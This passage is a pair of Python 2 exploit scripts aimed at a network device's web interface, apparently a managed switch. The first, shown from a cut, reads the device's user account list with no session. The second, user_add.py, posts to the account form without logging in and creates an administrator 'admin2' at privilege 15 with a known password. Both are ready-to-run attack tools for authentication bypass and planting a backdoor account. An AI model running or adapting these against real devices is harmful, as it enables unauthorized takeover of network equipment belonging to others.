    """Tries to request the URL. Returns True if the request was successful, False otherwise.
    http://ip_address/DataStore/990_user_account.js?index=0&pagesize=10

    response -- after the function has finished, will possibly contain the response to the request.
    """
    response[0] = None

    try:
        # Create request to URL.
        ip = sys.argv[1]
        print ip
        req = urllib2.Request("http://%s/DataStore/990_user_account.js?index=0&pagesize=10" % ip)

        # Headers mirror a browser's XHR from the login page; no session cookie is sent.
        req.add_header("Connection", "keep-alive")
        req.add_header("Accept", "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01")
        req.add_header("X-Requested-With", "XMLHttpRequest")
        req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.59 Safari/537.36")
        req.add_header("Referer", "http://%s/www/login.html" % ip)
        req.add_header("Accept-Encoding", "gzip, deflate, sdch")
        req.add_header("Accept-Language", "en-US,en;q=0.8")
        req.add_header("Cookie", "Language=en")

        # Get response to request.
        response[0] = urllib2.urlopen(req)

    except urllib2.URLError, e:
        # URLError.code existing indicates a valid HTTP response, but with a
        # non-200 status code (e.g. 304 Not Modified, 404 Not Found).
        if not hasattr(e, "code"):
            return False
        response[0] = e
    except Exception:
        return False

    return True


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "Usage: %s <ip_address>" % sys.argv[0]
        sys.exit(1)
    make_requests()

===========
user_add.py
===========

import sys
import gzip
import zlib
import urllib2
from StringIO import StringIO


def make_requests():
    """Calls request functions sequentially."""
    response = [None]

    if request_ip(response):
        # Success: the account in the request body was accepted.
        read_response(response[0])
        print "Username admin2 (privilege 15) successfully added"
        response[0].close()
    else:
        # Failure: no usable response.
        print "Request to %s failed" % sys.argv[1]


def read_response(response):
    """Returns the text contained in the response, e.g. the page HTML.
    Only handles the most common HTTP content encodings."""
    encoding = response.info().get('Content-Encoding')

    if encoding == 'gzip':
        buf = StringIO(response.read())
        return gzip.GzipFile(fileobj=buf).read()

    elif encoding == 'deflate':
        decompress = zlib.decompressobj(-zlib.MAX_WBITS)
        inflated = decompress.decompress(response.read())
        inflated += decompress.flush()
        return inflated

    return response.read()


def request_ip(response):
    """Tries to request the URL. Returns True if the request was successful, False otherwise.
    http://ip_address/form/User_Accounts_Apply

    response -- after the function has finished, will possibly contain the response to the request.
    """
    response[0] = None

    try:
        # Create request to URL.
        ip = sys.argv[1]
        req = urllib2.Request("http://%s/form/User_Accounts_Apply" % ip)

        # Headers mirror a browser form post from the login page; no session cookie is sent.
        req.add_header("Connection", "keep-alive")
        req.add_header("Cache-Control", "max-age=0")
        req.add_header("Origin", "http://%s/" % ip)
        req.add_header("Upgrade-Insecure-Requests", "1")
        req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.51 Safari/537.36")
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
        req.add_header("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
        req.add_header("Referer", "http://%s/www/login.html" % ip)
        req.add_header("Accept-Encoding", "gzip, deflate")
        req.add_header("Accept-Language", "en-US,en;q=0.8")

        # Set request body: action=0 adds the account, privilege=15 is the highest level.
        body = "action=0&username=admin2&privilege=15&type=0&password=admin2"

        # Get response to request (urlopen sends a POST when a body is given).
        response[0] = urllib2.urlopen(req, body)

    except urllib2.URLError, e:
        # URLError.code existing indicates a valid HTTP response, but with a
        # non-200 status code (e.g. 304 Not Modified, 404 Not Found).
        if not hasattr(e, "code"):
            return False
        response[0] = e
    except Exception:
        return False

    return True


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "Usage: %s <ip_address>" % sys.argv[0]
        sys.exit(1)
    make_requests()